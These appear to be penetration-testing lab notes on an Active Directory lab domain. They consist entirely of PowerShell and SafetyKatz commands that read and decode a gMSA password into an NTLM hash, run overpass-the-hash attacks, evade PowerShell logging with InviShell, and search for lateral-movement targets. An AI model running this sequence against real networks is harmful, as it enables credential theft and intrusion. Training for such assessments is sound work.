gMSA

PS> Get-ADServiceAccount -Filer *
PS> Get-ADServiceAccount -Identity jumpone -Properties * | select PrincipalsAllowedToRetrieveManagedPassword
 
# become an user that's allowed to access the PW
PS> C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth /user:provisioningsvc /domain:us.techcorp.local /aes256:a573a68973bfe9cbfb8037347397d6ad1aae87673c4f5b4979b57c0b745aee2a /run:cmd.exe" "exit"
PS> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
PS> Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
PS> Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
PS> $Passwordblob = (Get-ADServiceAccount -Identity jumpone -Properties msDS-ManagedPassword).'msDS-ManagedPassword'
PS> Import-Module C:\AD\Tools\DSInternals_v4.7\DSInternals\DSInternals.psd1
PS> $decodedpwd = ConvertFrom-ADManagedPasswordBlob $Passwordblob
PS> ConvertTo-NTHash –Password $decodedpwd.SecureCurrentPassword 
# now we have a password hash (ntlm), use it
 
PS> C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth /user:jumpone /domain:us.techcorp.local /ntlm:0a02c684cc0fa1744195edd1aec43078 /run:cmd.exe" "exit"
 
# use it to find new access
PS> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
ps> . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
ps> Find-PSRemotingLocalAdminAccess -Verbose